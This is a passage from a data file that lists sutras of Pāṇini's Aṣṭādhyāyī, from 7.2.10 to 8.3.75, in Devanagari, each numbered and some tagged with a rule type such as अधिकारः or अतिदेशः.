उपदेशेऽनुदात्तात्","7.2.11::श्र्युकः किति","7.2.12::सनि ग्रहगुहोश्च","7.2.13::कृसृभृवृस्तुद्रुस्रुश्रुवो लिटि","7.2.14::श्वीदितो निष्ठायाम्","7.2.15::यस्य विभाषा","7.2.16::आदितश्च","7.2.17::विभाषा भावादिकर्मणोः","7.2.18::क्षुब्धस्वान्तध्वान्तलग्नम्लिष्टविरिब्धफाण्टबाढानि मन्थमनस्तमःसक्ताविस्पष्टस्वरानायासभृशेषु","7.2.19:अधिकारः:धृषिशसी वैयात्ये","7.2.20::दृढः स्थूलबलयोः","7.2.21::प्रभौ परिवृढः","7.2.22::कृच्छ्रगहनयोः कषः","7.2.23::घुषिरविशब्दने","7.2.24::अर्देः संनिविभ्यः","7.2.25::अभेश्चाविदूर्ये","7.2.26::णेरध्ययने वृत्तम्","7.2.27::वा दान्तशान्तपूर्णदस्तस्पष्टच्छन्नज्ञप्ताः","7.2.28::रुष्यमत्वरसंघुषास्वनाम्","7.2.29::हृषेर्लोमसु","7.2.30::अपचितश्च","7.2.31::ह्रु ह्वरेश्छन्दसि","7.2.32::अपरिह्वृताश्च","7.2.33::सोमे ह्वरितः","7.2.34::ग्रसितस्कभितस्तभितोत्तभितचत्तविकस्तविशस्तॄशंस्तृशास्तृतरुतृतरूतृवरुतृवरूतृवरुत्रीरुज्ज्वलितिक्षरितिक्षमितिवमित्यमितीति च","7.2.35::आर्धधातुकस्येड् वलादेः","7.2.36::स्नुक्रमोरनात्मनेपदनिमित्ते","7.2.37::ग्रहोऽलिटि दीर्घः","7.2.38::वॄतो वा","7.2.39::न लिङि","7.2.40::सिचि च 
परस्मैपदेषु","7.2.41::इट् सनि वा","7.2.42::लिङ्सिचोरात्मनेपदेषु","7.2.43::ऋतश्च संयोगादेः","7.2.44::स्वरतिसूतिसूयतिधूञूदितो वा","7.2.45::रधादिभ्यश्च","7.2.46::निरः कुषः","7.2.47::इण्निष्ठायाम्","7.2.48::तीषसहलुभरुषरिषः","7.2.49::सनीवन्तर्धभ्रस्जदम्भुश्रिस्वृयूर्णुभरज्ञपिसनाम्","7.2.50::क्लिशः क्त्वानिष्ठयोः","7.2.51::पूङश्च","7.2.52::वसतिक्षुधोरिट्","7.2.53::अञ्चेः पूजायाम्","7.2.54::लुभो विमोचने","7.2.55::जॄव्रश्च्योः क्त्वि","7.2.56::उदितो वा","7.2.57::सेऽसिचि कृतचृतच्छृदतृदनृतः","7.2.58::गमेरिट् परस्मैपदेषु","7.2.59::न वृद्भ्यश्चतुर्भ्यः","7.2.60::तासि च कॢपः","7.2.61::अचस्तास्वत् थल्यनिटो नित्यम्","7.2.62::उपदेशेऽत्वतः","7.2.63::ऋतो भारद्वाजस्य","7.2.64::बभूथाततन्थजगृम्भववर्थेति निगमे","7.2.65::विभाषा सृजिदृषोः","7.2.66::इडत्त्यर्तिव्ययतीनाम्","7.2.67::वस्वेकाजाद्घसाम्","7.2.68::विभाषा गमहनविदविशाम्","7.2.69::सनिंससनिवांसम्","7.2.70::ऋद्धनोः स्ये","7.2.71::अञ्जेः सिचि","7.2.72::स्तुसुधूञ्भ्यः परस्मैपदेषु","7.2.73::यमरमनमातां सक् च","7.2.74::स्मिपूङ्रञ्ज्वशां सनि","7.2.75::किरश्च पञ्चभ्यः","7.2.76::रुदादिभ्यः सार्वधातुके","7.2.77::ईशः से","7.2.78::ईडजनोर्ध्वे च","7.2.79::लिङः सलोपोऽनन्त्यस्य","7.2.80::अतो येयः","7.2.81::आतो ङितः","7.2.82::आने मुक्","7.2.83::ईदासः","7.2.84::अष्टन आ विभक्तौ","7.2.85::रायो हलि","7.2.86::युष्मदस्मदोरनादेशे","7.2.87::द्वितीयायां च","7.2.88::प्रथमायाश्च द्विवचने भाषायाम्","7.2.89::योऽचि","7.2.90::शेषे लोपः","7.2.91::मपर्यन्तस्य","7.2.92::युवावौ द्विवचने","7.2.93::यूयवयौ जसि","7.2.94::त्वाहौ सौ","7.2.95::तुभ्यमह्यौ ङयि","7.2.96::तवममौ ङसि","7.2.97::त्वमावेकवचने","7.2.98::प्रतयोत्तरपदयोश्च","7.2.99::त्रिचतुरोः स्त्रियां तिसृचतसृ","7.2.100::अचि र ऋतः","7.2.101::जराया जरसन्यतरस्याम्","7.2.102::त्यदादीनामः","7.2.103::किमः कः","7.2.104::कु तिहोः","7.2.105::क्वाति","7.2.106::तदोः सः सावनन्त्ययोः","7.2.107::अदस औ सुलोपश्च","7.2.108::इदमो मः","7.2.109::दश्च","7.2.110::यः सौ","7.2.111::इदोऽय् पुंसि","7.2.112::अनाप्यकः","7.2.113::हलि लोपः","7.2.114::मृजेर्वृद्धिः","7.2.115::अचो ञ्णिति","7.2.116::अत उपधायाः","7.2.117::तद्धितेष्वचामादेः","7.2.118::किति च","7.3.1::देविकाशिंशपादित्यवाड्दीर्घसत्रश्रेयसामात्","7.3.2::केकयमित्त्रयुप्रलयानां यादेरियः","7.3.3::न य्वाभ्यां पदान्ताभ्याम् पूर्वौ तु ताभ्यामैच्","7.3.4::द्वारादीनां च","7.3.5::न्यग्रोधस्य च केवलस्य","7.3.6::न कर्मव्यतिहारे","7.3.7::स्वागतादीनां च","7.3.8::श्वादेरिञि","7.3.9::पदान्तस्यान्यतरस्याम्","7.3.10:अधिकारः:उत्तरपदस्य","7.3.11::अवयवादृतोः","7.3.12::सुसर्वार्धाज्जनपदस्य","7.3.13::दिशोऽमद्राणाम्","7.3.14::प्राचां ग्रामनगराणाम्","7.3.15::संख्यायाः संवत्सरसंख्यस्य च","7.3.16::वर्षस्याभविष्यति","7.3.17::परिमाणान्तस्यासंज्ञाशाणयोः","7.3.18::जे प्रोष्ठपदानाम्","7.3.19::हृद्भगसिन्ध्वन्ते पूर्वपदस्य च","7.3.20::अनुशतिकादीनां च","7.3.21::देवताद्वंद्वे च","7.3.22::नेन्द्रस्य परस्य","7.3.23::दीर्घाच्च वरुणस्य","7.3.24::प्राचां नगरान्ते","7.3.25::जङ्गलधेनुवलजान्तस्य विभाषितमुत्तरम्","7.3.26::अर्धात् परिमाणस्य पूर्वस्य तु वा","7.3.27::नातः परस्य","7.3.28::प्रवाहणस्य ढे","7.3.29::तत्प्रत्ययस्य च","7.3.30::नञः शुचीश्वरक्षेत्रज्ञकुशलनिपुणानाम्","7.3.31::यथातथयथापुरयोः पर्यायेण","7.3.32::हनस्तोऽचिण्णलोः","7.3.33::आतो युक् चिण्कृतोः","7.3.34::नोदात्तोपदेशस्य मान्तस्यानाचमेः","7.3.35::जनिवध्योश्च","7.3.36::अर्त्तिह्रीब्लीरीक्नूयीक्ष्माय्यातां पुङ्णौ","7.3.37::शाच्छासाह्वाव्यावेपां युक्","7.3.38::वो विधूनने जुक्","7.3.39::लीलोर्नुग्लुकावन्यतरस्यां स्नेहविपातने","7.3.40::भियो हेतुभये षुक्","7.3.41::स्फायो वः","7.3.42::शदेरगतौ तः","7.3.43::रुहः पोऽन्यतरस्याम्","7.3.44::प्रत्ययस्थात् कात् पूर्वस्यात इदाप्यसुपः","7.3.45::न यासयोः","7.3.46::उदीचामातः स्थाने 
यकपूर्वायाः","7.3.47::भस्त्रैषाऽजाज्ञाद्वास्वानञ्पूर्वाणामपि","7.3.48::अभाषितपुंस्काच्च","7.3.49::आदाचार्याणाम्","7.3.50::ठस्येकः","7.3.51::इसुसुक्तान्तात् कः","7.3.52::चजोः कु घिन्ण्यतोः","7.3.53::न्यङ्क्वादीनां च","7.3.54::हो हन्तेर्ञ्णिन्नेषु","7.3.55::अभ्यासाच्च","7.3.56::हेरचङि","7.3.57::सन्लिटोर्जेः","7.3.58::विभाषा चेः","7.3.59::न क्वादेः","7.3.60::अजिवृज्योश्च","7.3.61::भुजन्युब्जौ पाण्युपतापयोः","7.3.62::प्रयाजानुयाजौ यज्ञाङ्गे","7.3.63::वञ्चेर्गतौ","7.3.64::ओक उचः के","7.3.65::ण्य आवश्यके","7.3.66::यजयाचरुचप्रवचर्चश्च","7.3.67::वचोऽशब्दसंज्ञायाम्","7.3.68::प्रयोज्यनियोज्यौ शक्यार्थे","7.3.69::भोज्यं भक्ष्ये","7.3.70::घोर्लोपो लेटि वा","7.3.71::ओतः श्यनि","7.3.72::क्सस्याचि","7.3.73::लुग्वा दुहदिहलिहगुहामात्मनेपदे दन्त्ये","7.3.74::शमामष्टानां दीर्घः श्यनि","7.3.75::ष्ठिवुक्लम्याचमां शिति","7.3.76::क्रमः परस्मैपदेषु","7.3.77::इषुगमियमां छः","7.3.78::पाघ्राध्मास्थाम्नादाण्दृश्यर्त्तिसर्त्तिशदसदां पिबजिघ्रधमतिष्ठमनयच्छपश्यर्च्छधौशीयसीदाः","7.3.79::ज्ञाजनोर्जा","7.3.80::प्वादीनां ह्रस्वः","7.3.81::मीनातेर्निगमे","7.3.82::मिदेर्गुणः","7.3.83::जुसि च","7.3.84::सार्वधातुकार्धधातुकयोः","7.3.85::जाग्रोऽविचिण्णल्ङित्सु","7.3.86::पुगन्तलघूपधस्य च","7.3.87::नाभ्यस्तस्याचि पिति सार्वधातुके","7.3.88::भूसुवोस्तिङि","7.3.89::उतो वृद्धिर्लुकि हलि","7.3.90::ऊर्णोतेर्विभाषा","7.3.91::गुणोऽपृक्ते","7.3.92::तृणह इम्","7.3.93::ब्रुव ईट्","7.3.94::यङो वा","7.3.95::तुरुस्तुशम्यमः सार्वधातुके","7.3.96::अस्तिसिचोऽपृक्ते","7.3.97::बहुलं छन्दसि","7.3.98::रुदश्च पञ्चभ्यः","7.3.99::अड्गार्ग्यगालवयोः","7.3.100::अदः सर्वेषाम्","7.3.101::अतो दीर्घो यञि","7.3.102::सुपि च","7.3.103::बहुवचने झल्येत्","7.3.104::ओसि च","7.3.105::आङि चापः","7.3.106::सम्बुद्धौ च","7.3.107::अम्बाऽर्थनद्योर्ह्रस्वः","7.3.108::ह्रस्वस्य गुणः","7.3.109::जसि च","7.3.110::ऋतो ङिसर्वनामस्थानयोः","7.3.111::घेर्ङिति","7.3.112::आण्नद्याः","7.3.113::याडापः","7.3.114::सर्वनाम्नः स्याड्ढ्रस्वश्च","7.3.115::विभाषा द्वितीयातृतीयाभ्याम्","7.3.116::ङेराम्नद्याम्नीभ्यः","7.3.117::इदुद्भ्याम्","7.3.118::औत्","7.3.119::अच्च घेः","7.3.120::आङो नाऽस्त्रियाम्","7.4.1::णौ चङ्युपधाया ह्रस्वः","7.4.2::नाग्लोपिशास्वृदिताम्","7.4.3::भ्राजभासभाषदीपजीवमीलपीडामन्यतरस्याम्","7.4.4::लोपः पिबतेरीच्चाभ्यासस्य","7.4.5::तिष्ठतेरित्","7.4.6::जिघ्रतेर्वा","7.4.7::उर्ऋत्","7.4.8::नित्यं छन्दसि","7.4.9::दयतेर्दिगि लिटि","7.4.10::ऋतश्च संयोगादेर्गुणः","7.4.11::ऋच्छत्यॄताम्","7.4.12::शृदॄप्रां ह्रस्वो वा","7.4.13::केऽणः","7.4.14::न कपि","7.4.15::आपोऽन्यतरस्याम्","7.4.16::ऋदृशोऽङि गुणः","7.4.17::अस्यतेस्थुक्","7.4.18::श्वयतेरः","7.4.19::पतः पुम्","7.4.20::वच उम्","7.4.21::शीङः सार्वधातुके गुणः","7.4.22::अयङ् यि क्ङिति","7.4.23::उपसर्गाद्ध्रस्व ऊहतेः","7.4.24::एतेर्लिङि","7.4.25::अकृत्सार्वधातुकयोर्दीर्घः","7.4.26::च्वौ च","7.4.27::रीङ् ऋतः","7.4.28::रिङ् शयग्लिङ्क्षु","7.4.29::गुणोऽर्तिसंयोगाद्योः","7.4.30::यङि च","7.4.31::ई घ्राध्मोः","7.4.32::अस्य च्वौ","7.4.33::क्यचि च","7.4.34::अशनायोदन्यधनाया बुभुक्षापिपासागर्द्धेषु","7.4.35::न च्छन्दस्यपुत्रस्य","7.4.36::दुरस्युर्द्रविणस्युर्वृषण्यतिरिषण्यति","7.4.37::अश्वाघस्यात्","7.4.38::देवसुम्नयोर्यजुषि काठके","7.4.39::कव्यध्वरपृतनस्यर्चि लोपः","7.4.40::द्यतिस्यतिमास्थामित्ति किति","7.4.41::शाछोरन्यतरस्याम्","7.4.42::दधातेर्हिः","7.4.43::जहातेश्च क्त्वि","7.4.44::विभाषा छन्दसि","7.4.45::सुधितवसुधितनेमधितधिष्वधिषीय च","7.4.46::दो दद् घोः","7.4.47::अच उपसर्गात्तः","7.4.48::अपो भि","7.4.49::सः स्यार्द्धधातुके","7.4.50::तासस्त्योर्लोपः","7.4.51::रि च","7.4.52::ह एति","7.4.53::यीवर्णयोर्दीधीवेव्योः","7.4.54::सनि मीमाघुरभलभशकपतपदामच इस्","7.4.55::आप्ज्ञप्यृधामीत्","7.4.56::दम्भ इच्च","7.4.57::मुचोऽकर्मकस्य गुणो वा","7.4.58::अत्र 
लोपोऽभ्यासस्य","7.4.59::ह्रस्वः","7.4.60::हलादिः शेषः","7.4.61::शर्पूर्वाः खयः","7.4.62::कुहोश्चुः","7.4.63::न कवतेर्यङि","7.4.64::कृषेश्छन्दसि","7.4.65::दाधर्तिदर्धर्तिदर्धर्षिबोभूतुतेतिक्तेऽलर्ष्यापनीफणत्संसनिष्यदत्करिक्रत्कनिक्रदद्भरिभ्रद्दविध्वतोदविद्युतत्तरित्रतःसरीसृपतंवरीवृजन्मर्मृज्यागनीगन्तीति च","7.4.66::उरत्","7.4.67::द्युतिस्वाप्योः सम्प्रसारणम्","7.4.68::व्यथो लिटि","7.4.69::दीर्घ इणः किति","7.4.70::अत आदेः","7.4.71::तस्मान्नुड् द्विहलः","7.4.72::अश्नोतेश्च","7.4.73::भवतेरः","7.4.74::ससूवेति निगमे","7.4.75::निजां त्रयाणां गुणः श्लौ","7.4.76::भृञामित्","7.4.77::अर्तिपिपर्त्योश्च","7.4.78::बहुलं छन्दसि","7.4.79::सन्यतः","7.4.80::ओः पुयण्ज्यपरे","7.4.81::स्रवतिशृणोतिद्रवतिप्रवतिप्लवतिच्यवतीनां वा","7.4.82::गुणो यङ्लुकोः","7.4.83::दीर्घोऽकितः","7.4.84::नीग्वञ्चुस्रंसुध्वंसुभ्रंसुकसपतपदस्कन्दाम्","7.4.85::नुगतोऽनुनासिकान्तस्य","7.4.86::जपजभदहदशभञ्जपशां च","7.4.87::चरफलोश्च","7.4.88::उत् परस्यातः","7.4.89::ति च","7.4.90::रीगृदुपधस्य च","7.4.91::रुग्रिकौ च लुकि","7.4.92::ऋतश्च","7.4.93:अतिदेशः:सन्वल्लघुनि चङ्परेऽनग्लोपे","7.4.94::दीर्घो लघोः","7.4.95::अत् स्मृदृत्वरप्रथम्रदस्तॄस्पशाम्","7.4.96::विभाषा वेष्टिचेष्ट्योः","7.4.97::ई च गणः","8.1.1:अधिकारः:सर्वस्य द्वे","8.1.2:संज्ञा:तस्य परमाम्रेडितम्","8.1.3::अनुदात्तं च","8.1.4::नित्यवीप्सयोः","8.1.5::परेर्वर्जने","8.1.6::प्रसमुपोदः पादपूरणे","8.1.7::उपर्यध्यधसः सामीप्ये","8.1.8::वाक्यादेरामन्त्रितस्यासूयासम्मतिकोपकुत्सनभर्त्सनेषु","8.1.9:अतिदेशः:एकं बहुव्रीहिवत्","8.1.10::आबाधे च","8.1.11:अतिदेशः:कर्मधारयवत् उत्तरेषु","8.1.12::प्रकारे गुणवचनस्य","8.1.13::अकृच्छ्रे प्रियसुखयोरन्यतरस्याम्","8.1.14::यथास्वे यथायथम्","8.1.15::द्वन्द्वं रहस्यमर्यादावचनव्युत्क्रमणयज्ञपात्रप्रयोगाभिव्यक्तिषु","8.1.16:अधिकारः:पदस्य","8.1.17:अधिकारः:पदात्","8.1.18:अधिकारः:अनुदात्तं सर्वमपादादौ","8.1.19::आमन्त्रितस्य च","8.1.20::युष्मदस्मदोः षष्ठीचतुर्थीद्वितीयास्थयोर्वान्नावौ","8.1.21::बहुवचने वस्नसौ","8.1.22::तेमयावेकवचनस्य","8.1.23::त्वामौ द्वितीयायाः","8.1.24::न चवाहाहैवयुक्ते","8.1.25::पश्यार्थैश्चानालोचने","8.1.26::सपूर्वायाः प्रथमाया विभाषा","8.1.27::तिङो गोत्रादीनि कुत्सनाभीक्ष्ण्ययोः","8.1.28::तिङ्ङतिङः","8.1.29::न लुट्","8.1.30::निपातैर्यद्यदिहन्तकुविन्नेच्चेच्चण्कच्चिद्यत्रयुक्तम्","8.1.31::नह प्रत्यारम्भे","8.1.32::सत्यं प्रश्ने","8.1.33::अङ्गाप्रातिलोम्ये","8.1.34::हि च","8.1.35::छन्दस्यनेकमपि साकाङ्क्षम्","8.1.36::यावद्यथाभ्याम्","8.1.37::पूजायां नानन्तरम्","8.1.38::उपसर्गव्यपेतं च","8.1.39::तुपश्यपश्यताहैः पूजायाम्","8.1.40::अहो च","8.1.41::शेषे विभाषा","8.1.42::पुरा च परीप्सायाम्","8.1.43::नन्वित्यनुज्ञैषणायाम्","8.1.44::किं क्रियाप्रश्नेऽनुपसर्गमप्रतिषिद्धम्","8.1.45::लोपे विभाषा","8.1.46::एहिमन्ये प्रहासे लृट्","8.1.47::जात्वपूर्वम्","8.1.48::किम्वृत्तं च चिदुत्तरम्","8.1.49::आहो उताहो चानन्तरम्","8.1.50::शेषे विभाषा","8.1.51::गत्यर्थलोटा लृण्न चेत् कारकं सर्वान्यत्","8.1.52::लोट् च","8.1.53::विभाषितं सोपसर्गमनुत्तमम्","8.1.54::हन्त च","8.1.55::आम एकान्तरमामन्त्रितमनन्तिके","8.1.56::यद्धितुपरं छन्दसि","8.1.57::चनचिदिवगोत्रादितद्धिताम्रेडितेष्वगतेः","8.1.58::चादिषु च","8.1.59::चवायोगे प्रथमा","8.1.60::हेति क्षियायाम्","8.1.61::अहेति विनियोगे च","8.1.62::चाहलोप एवेत्यवधारणम्","8.1.63::चादिलोपे विभाषा","8.1.64::वैवावेति च च्छन्दसि","8.1.65::एकान्याभ्यां समर्थाभ्याम्","8.1.66::यद्वृत्तान्नित्यं","8.1.67::पूजनात् पूजितमनुदात्तम् {काष्ठादिभ्यः}","8.1.68::सगतिरपि तिङ्","8.1.69::कुत्सने च सुप्यगोत्रादौ","8.1.70::गतिर्गतौ","8.1.71::तिङि चोदात्तवति","8.1.72:अतिदेशः:आमन्त्रितं पूर्वम् अविद्यमानवत्","8.1.73::नामन्त्रिते समानाधिकरणे {सामान्यवचनम्}","8.1.74::विभाषितं विशेषवचने बहुवचनम्","8.2.1:अतिदेशः; अधिकारः:पूर्वत्रासिद्धम्","8.2.2:अतिदेशः:नलोपः 
सुप्स्वरसंज्ञातुग्विधिषु कृति","8.2.3:अतिदेशः:न मु ने","8.2.4:अतिदेशः:उदात्तस्वरितयोर्यणः स्वरितोऽनुदात्तस्य","8.2.5:अतिदेशः:एकादेश उदात्तेनोदात्तः","8.2.6:अतिदेशः:स्वरितो वाऽनुदात्ते पदादौ","8.2.7:अतिदेशः:नलोपः प्रातिपदिकान्तस्य","8.2.8:अतिदेशः:न ङिसम्बुद्ध्योः","8.2.9:अतिदेशः:मादुपधायाश्च मतोर्वोऽयवादिभ्यः","8.2.10:अतिदेशः:झयः","8.2.11:अतिदेशः:संज्ञायाम्","8.2.12:अतिदेशः:आसन्दीवदष्ठीवच्चक्रीवत्कक्षीवद्रुमण्वच्चर्मण्वती","8.2.13:अतिदेशः:उदन्वानुदधौ च","8.2.14:अतिदेशः:राजन्वान् सौराज्ये","8.2.15:अतिदेशः:छन्दसीरः","8.2.16:अतिदेशः:अनो नुट्","8.2.17:अतिदेशः:नाद्घस्य","8.2.18:अतिदेशः:कृपो रो लः","8.2.19:अतिदेशः:उपसर्गस्यायतौ","8.2.20:अतिदेशः:ग्रो यङि","8.2.21:अतिदेशः:अचि विभाषा","8.2.22:अतिदेशः:परेश्च घाङ्कयोः","8.2.23:अतिदेशः:संयोगान्तस्य लोपः","8.2.24:अतिदेशः:रात् सस्य","8.2.25:अतिदेशः:धि च","8.2.26:अतिदेशः:झलो झलि","8.2.27:अतिदेशः:ह्रस्वादङ्गात्","8.2.28:अतिदेशः:इट ईटि","8.2.29:अतिदेशः:स्कोः संयोगाद्योरन्ते च","8.2.30:अतिदेशः:चोः कुः","8.2.31:अतिदेशः:हो ढः","8.2.32:अतिदेशः:दादेर्धातोर्घः","8.2.33:अतिदेशः:वा द्रुहमुहष्णुहष्णिहाम्","8.2.34:अतिदेशः:नहो धः","8.2.35:अतिदेशः:आहस्थः","8.2.36:अतिदेशः:व्रश्चभ्रस्जसृजमृजयजराजभ्राजच्छशां षः","8.2.37:अतिदेशः:एकाचो बशो भष् झषन्तस्य स्ध्वोः","8.2.38:अतिदेशः:दधस्तथोश्च","8.2.39:अतिदेशः:झलां जशोऽन्ते","8.2.40:अतिदेशः:झषस्तथोर्धोऽधः","8.2.41:अतिदेशः:षढोः कः सि","8.2.42:अतिदेशः:रदाभ्यां निष्ठातो नः पूर्वस्य च दः","8.2.43:अतिदेशः:संयोगादेरातो धातोर्यण्वतः","8.2.44:अतिदेशः:ल्वादिभ्यः","8.2.45:अतिदेशः:ओदितश्च","8.2.46:अतिदेशः:क्षियो दीर्घात्","8.2.47:अतिदेशः:श्योऽस्पर्शे","8.2.48:अतिदेशः:अञ्चोऽनपादाने","8.2.49:अतिदेशः:दिवोऽविजिगीषायाम्","8.2.50:अतिदेशः:निर्वाणोऽवाते","8.2.51:अतिदेशः:शुषः कः","8.2.52:अतिदेशः:पचो वः","8.2.53:अतिदेशः:क्षायो मः","8.2.54:अतिदेशः:प्रस्त्योऽन्यतरस्याम्","8.2.55:अतिदेशः:अनुपसर्गात् फुल्लक्षीबकृशोल्लाघाः","8.2.56:अतिदेशः:नुदविदोन्दत्राघ्राह्रीभ्योऽन्यतरस्याम्","8.2.57:अतिदेशः:न ध्याख्यापॄमूर्छिमदाम्","8.2.58:अतिदेशः:वित्तो भोगप्रत्यययोः","8.2.59:अतिदेशः:भित्तं शकलम्","8.2.60:अतिदेशः:ऋणमाधमर्ण्ये","8.2.61:अतिदेशः:नसत्तनिषत्तानुत्तप्रतूर्तसूर्तगूर्तानि छन्दसि","8.2.62:अतिदेशः:क्विन्प्रत्ययस्य कुः","8.2.63:अतिदेशः:नशेर्वा","8.2.64:अतिदेशः:मो नो धातोः","8.2.65:अतिदेशः:म्वोश्च","8.2.66:अतिदेशः:ससजुषो रुः","8.2.67:अतिदेशः:अवयाःश्वेतवाःपुरोडाश्च","8.2.68:अतिदेशः:अहन्","8.2.69:अतिदेशः:रोऽसुपि","8.2.70:अतिदेशः:अम्नरूधरवरित्युभयथा छन्दसि","8.2.71:अतिदेशः:भुवश्च महाव्याहृतेः","8.2.72:अतिदेशः:वसुस्रंसुध्वंस्वनडुहां दः","8.2.73:अतिदेशः:तिप्यनस्तेः","8.2.74:अतिदेशः:सिपि धातो रुर्वा","8.2.75:अतिदेशः:दश्च","8.2.76:अतिदेशः:र्वोरुपधाया दीर्घ इकः","8.2.77:अतिदेशः:हलि च","8.2.78:अतिदेशः:उपधायां च","8.2.79:अतिदेशः:न भकुर्छुराम्","8.2.80:अतिदेशः:अदसोऽसेर्दादु दो मः","8.2.81:अतिदेशः:एत ईद्बहुवचने","8.2.82:अतिदेशः; अधिकारः:वाक्यस्य टेः प्लुत उदात्तः","8.2.83:अतिदेशः:प्रत्यभिवादेअशूद्रे","8.2.84:अतिदेशः:दूराद्धूते च","8.2.85:अतिदेशः:हैहेप्रयोगे हैहयोः","8.2.86:अतिदेशः:गुरोरनृतोऽनन्त्यस्याप्येकैकस्य प्राचाम्","8.2.87:अतिदेशः:ओमभ्यादाने","8.2.88:अतिदेशः:ये यज्ञकर्मणि","8.2.89:अतिदेशः:प्रणवष्टेः","8.2.90:अतिदेशः:याज्याऽन्तः","8.2.91:अतिदेशः:ब्रूहिप्रेस्यश्रौषड्वौषडावहानामादेः","8.2.92:अतिदेशः:अग्नीत्प्रेषणे परस्य च","8.2.93:अतिदेशः:विभाषा पृष्टप्रतिवचने हेः","8.2.94:अतिदेशः:निगृह्यानुयोगे च","8.2.95:अतिदेशः:आम्रेडितं भर्त्सने","8.2.96:अतिदेशः:अङ्गयुक्तं तिङ् आकाङ्क्षम्","8.2.97:अतिदेशः:विचार्यमाणानाम्","8.2.98:अतिदेशः:पूर्वं तु भाषायाम्","8.2.99:अतिदेशः:प्रतिश्रवणे च","8.2.100:अतिदेशः:अनुदात्तं प्रश्नान्ताभिपूजितयोः","8.2.101:अतिदेशः:चिदिति चोपमाऽर्थे प्रयुज्यमाने","8.2.102:अतिदेशः:उपरिस्विदासीदिति 
च","8.2.103:अतिदेशः:स्वरितमाम्रेडितेऽसूयासम्मतिकोपकुत्सनेषु","8.2.104:अतिदेशः:क्षियाऽऽशीःप्रैषेषु तिङ् आकाङ्क्षम्","8.2.105:अतिदेशः:अनन्त्यस्यापि प्रश्नाख्यानयोः","8.2.106:अतिदेशः:प्लुतावैच इदुतौ","8.2.107:अतिदेशः:एचोऽप्रगृह्यस्यादूराद्धूते पूर्वस्यार्धस्यादुत्तरस्येदुतौ","8.2.108:अतिदेशः; अधिकारः:तयोर्य्वावचि संहितायाम्","8.3.1:अतिदेशः:मतुवसो रु सम्बुद्धौ छन्दसि","8.3.2:अतिदेशः:अत्रानुनासिकः पूर्वस्य तु वा","8.3.3:अतिदेशः:आतोऽटि नित्यम्","8.3.4:अतिदेशः:अनुनासिकात् परोऽनुस्वारः","8.3.5:अतिदेशः:समः सुटि","8.3.6:अतिदेशः:पुमः खय्यम्परे","8.3.7:अतिदेशः:नश्छव्यप्रशान्","8.3.8:अतिदेशः:उभयथर्क्षु","8.3.9:अतिदेशः:दीर्घादटि समानपदे","8.3.10:अतिदेशः:नॄन् पे","8.3.11:अतिदेशः:स्वतवान् पायौ","8.3.12:अतिदेशः:कानाम्रेडिते","8.3.13:अतिदेशः:ढो ढे लोपः","8.3.14:अतिदेशः:रो रि","8.3.15:अतिदेशः:खरवसानयोर्विसर्जनीयः","8.3.16:अतिदेशः:रोः सुपि","8.3.17:अतिदेशः:भोभगोअघोअपूर्वस्य योऽशि","8.3.18:अतिदेशः:व्योर्लघुप्रयत्नतरः शाकटायनस्य","8.3.19:अतिदेशः:लोपः शाकल्यस्य","8.3.20:अतिदेशः:ओतो गार्ग्यस्य","8.3.21:अतिदेशः:उञि च पदे","8.3.22:अतिदेशः:हलि सर्वेषाम्","8.3.23:अतिदेशः:मोऽनुस्वारः","8.3.24:अतिदेशः:नश्चापदान्तस्य झलि","8.3.25:अतिदेशः:मो राजि समः क्वौ","8.3.26:अतिदेशः:हे मपरे वा","8.3.27:अतिदेशः:नपरे नः","8.3.28:अतिदेशः:ङ्णोः कुक्टुक् शरि","8.3.29:अतिदेशः:डः सि धुट्","8.3.30:अतिदेशः:नश्च","8.3.31:अतिदेशः:शि तुक्","8.3.32:अतिदेशः:ङमो ह्रस्वादचि ङमुण्नित्यम्","8.3.33:अतिदेशः:मय उञो वो वा","8.3.34:अतिदेशः:विसर्जनीयस्य सः","8.3.35:अतिदेशः:शर्परे विसर्जनीयः","8.3.36:अतिदेशः:वा शरि","8.3.37:अतिदेशः:कुप्वोः XकXपौ च","8.3.38:अतिदेशः:सोऽपदादौ","8.3.39:अतिदेशः:इणः षः","8.3.40:अतिदेशः:नमस्पुरसोर्गत्योः","8.3.41:अतिदेशः:इदुदुपधस्य चाप्रत्ययस्य","8.3.42:अतिदेशः:तिरसोऽन्यतरस्याम्","8.3.43:अतिदेशः:द्विस्त्रिश्चतुरिति कृत्वोऽर्थे","8.3.44:अतिदेशः:इसुसोः सामर्थ्ये","8.3.45:अतिदेशः:नित्यं समासेऽनुत्तरपदस्थस्य","8.3.46:अतिदेशः:अतः कृकमिकंसकुम्भपात्रकुशाकर्णीष्वनव्ययस्य","8.3.47:अतिदेशः:अधःशिरसी पदे","8.3.48:अतिदेशः:कस्कादिषु च","8.3.49:अतिदेशः:छन्दसि वाऽप्राम्रेडितयोः","8.3.50:अतिदेशः:कःकरत्करतिकृधिकृतेष्वनदितेः","8.3.51:अतिदेशः:पञ्चम्याः परावध्यर्थे","8.3.52:अतिदेशः:पातौ च बहुलम्","8.3.53:अतिदेशः:षष्ठ्याः पतिपुत्रपृष्ठपारपदपयस्पोषेषु","8.3.54:अतिदेशः:इडाया वा","8.3.55:अतिदेशः; अधिकारः:अपदान्तस्य मूर्धन्यः","8.3.56:अतिदेशः:सहेः साडः सः","8.3.57:अतिदेशः; अधिकारः:इण्कोः","8.3.58:अतिदेशः:नुम्विसर्जनीयशर्व्यवायेऽपि","8.3.59:अतिदेशः:आदेशप्रत्यययोः","8.3.60:अतिदेशः:शासिवसिघसीनां च","8.3.61:अतिदेशः:स्तौतिण्योरेव षण्यभ्यासात्","8.3.62:अतिदेशः:सः स्विदिस्वदिसहीनां च","8.3.63:अतिदेशः:प्राक्सितादड्व्यवायेऽपि","8.3.64:अतिदेशः:स्थाऽऽदिष्वभ्यासेन चाभ्यासय","8.3.65:अतिदेशः:उपसर्गात् सुनोतिसुवतिस्यतिस्तौतिस्तोभतिस्थासेनयसेधसिचसञ्जस्वञ्जाम्","8.3.66:अतिदेशः:सदिरप्रतेः","8.3.67:अतिदेशः:स्तम्भेः","8.3.68:अतिदेशः:अवाच्चालम्बनाविदूर्ययोः","8.3.69:अतिदेशः:वेश्च स्वनो भोजने","8.3.70:अतिदेशः:परिनिविभ्यः सेवसितसयसिवुसहसुट्स्तुस्वञ्जाम्","8.3.71:अतिदेशः:सिवादीनां वाऽड्व्यवायेऽपि","8.3.72:अतिदेशः:अनुविपर्यभिनिभ्यः स्यन्दतेरप्राणिषु","8.3.73:अतिदेशः:वेः स्कन्देरनिष्ठायाम्","8.3.74:अतिदेशः:परेश्च","8.3.75:अतिदेशः:परिस्कन्दः 